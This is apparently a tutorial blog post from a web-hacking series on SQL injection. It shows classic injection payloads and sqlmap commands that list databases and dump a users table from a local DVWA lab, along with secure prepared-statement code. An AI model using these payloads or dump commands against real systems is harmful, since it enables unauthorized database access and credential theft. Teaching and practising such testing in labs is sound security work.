Introduction
SQL Injection (SQLi) is a powerful vulnerability where an attacker tricks the web app into running unauthorized SQL queries.
It’s a classic — and still one of the most exploited bugs in real-world breaches.
In this part, you’ll learn:
✅ What SQL Injection is
✅ How to find and test for it manually
✅ How to automate attacks using SQLMap
✅ How to extract data like usernames and passwords
🔎 What Is SQL Injection?
When a web application uses unsanitized user input directly in a SQL query, an attacker can inject malicious SQL code.
❌ Vulnerable PHP Code:
$query = "SELECT * FROM users WHERE id = '$id';"If $id is taken directly from the URL or a form without validation, it’s vulnerable to injection.
🧪 Malicious Input via URL:
?id=1' OR '1'='1This transforms the SQL query into:
SELECT * FROM users WHERE id = '1' OR '1'='1';✅ This condition is always true, so the query returns all users — or worse, bypasses authentication completely.
🧪 Testing for SQLi Manually
Start testing by injecting common payloads into URL parameters or form fields:
?id=1'
?id=1' OR '1'='1
?id=1' AND 1=2 --Common signs of vulnerability:
- ❗ SQL error messages in the response (e.g., “You have an error in your SQL syntax”)
- 🔄 Unexpected page behavior (e.g., login success without credentials)
- 📤 Data leakage or information disclosure
If any of these occur, the parameter is likely injectable and further testing is warranted.
🧰 Practice Target: DVWA (Low Security)
Open the DVWA interface in your browser and go to:
SQL Injection ModuleIn the input field or URL, try the following payload:
?id=1' OR '1'='1What to Observe:
- 📄 Does the page return all user records?
- ❗ Does it throw a MySQL error?
If either happens — congratulations 🎯 — you’ve found a vulnerable endpoint!
⚙️ Automating SQLi with SQLMap
Installation: (Kali Linux comes with it pre-installed)
sudo apt install sqlmap▶️ Basic Usage:
Scan a vulnerable URL and list available databases:
sqlmap -u "http://localhost/dvwa/vulnerable.php?id=1" --batch --dbs📥 Extract Tables & Data:
Example to dump data from the users table in the dvwa database:
sqlmap -u "http://localhost/dvwa/vulnerable.php?id=1" -D dvwa -T users --dump📌 Useful SQLMap Options:
--dbs– List all databases--tables– List tables in a specific database--columns– View columns in a table--dump– Extract full table data
🛑 Defensive Notes (If You're a Developer)
Protect your web application by following these best practices:
- ✅ Use prepared statements (PDO or mysqli with bound parameters)
- ✅ Validate and sanitize all user input
- ✅ Use ORM libraries (like Eloquent, Doctrine) to abstract direct SQL queries
Secure Example using PDO:
$stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?");
$stmt->execute([$id]);This ensures user input is safely handled — preventing malicious SQL injection.
🧠 Real-World Impact
SQLi has led to:
Full database leaks
Admin login bypass
Remote file access
Privilege escalation
Still found in production apps — even in 2024.
🧪 Challenge: Try It Yourself
Try SQLi in:
bWAPP → SQL Injection (GET/POST/Search)
Juice Shop → Search injection
Use Burp Suite to intercept & modify requests on the fly.
🔚 Wrapping Up
SQL Injection is easy to exploit but deadly if missed. You’ve now seen both manual and automated testing — and how attackers turn a single bug into full control.
👉 Next up:
Part 5 – Cross-Site Scripting (XSS): Injecting Scripts into Web Pages
We’ll explore how XSS can hijack sessions, steal cookies, and deface content — and how to test for it effectively.
1 thought on “SQL Injection – Extracting Data from Web Apps”